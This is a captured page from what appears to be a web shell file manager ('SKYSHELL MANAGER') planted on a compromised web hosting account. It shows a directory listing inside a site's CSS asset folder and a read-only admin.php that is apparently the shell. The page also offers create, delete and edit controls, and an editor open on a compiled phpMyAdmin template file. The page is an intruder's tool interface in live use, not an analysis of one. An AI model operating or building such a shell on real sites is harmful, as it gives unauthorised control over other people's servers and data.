📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
ads
/
admin
/
assets
/
vendor
/
boxicons
/
css
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
admin.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
830.23 KB
0644
🗑️
⬇️
✏️
🔒
Editing: a9bbda942f84d13d0d6d0b0ecf5f20f3.php
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* table/export/index.twig */ class __TwigTemplate_c7956d2c1dd2a83e44f7ff7c54b1513a extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->blocks = [ 'title' => [$this, 'block_title'], ]; } protected function doGetParent(array $context) { // line 1 return "export.twig"; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 11 $context["filename_hint"] = ('' === $tmp = \Twig\Extension\CoreExtension::captureOutput((function () use (&$context, $macros, $blocks) { // line 12 yield " "; yield _gettext("@SERVER@ will become the server name, @DATABASE@ will become the database name and @TABLE@ will become the table name."); return; yield ''; })())) ? '' : new Markup($tmp, $this->env->getCharset()); // line 1 $this->parent = $this->loadTemplate("export.twig", "table/export/index.twig", 1); yield from $this->parent->unwrap()->yield($context, array_merge($this->blocks, $blocks)); } // line 3 public function block_title($context, array $blocks = []) { $macros = $this->macros; // line 4 yield " "; if ((($context["export_type"] ?? null) == "raw")) { // line 5 yield " "; // l10n: A query that the user has written freely yield _gettext("Exporting a raw query"); // line 6 yield " "; } else { // line 7 yield " "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(Twig\Extension\CoreExtension::sprintf(_gettext("Exporting rows from \"%s\" table"), ($context["table"] ?? null)), "html", null, true); yield " "; } return; yield ''; } /** * @codeCoverageIgnore */ public function getTemplateName() { return "table/export/index.twig"; } /** * @codeCoverageIgnore */ public function isTraitable() { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo() { return array ( 69 => 7, 66 => 6, 62 => 5, 59 => 4, 55 => 3, 50 => 1, 45 => 12, 43 => 11, 36 => 1,); } public function getSourceContext() { return new Source("", "table/export/index.twig", "/usr/local/cpanel/base/3rdparty/phpMyAdmin/templates/table/export/index.twig"); } }
💾 Save Changes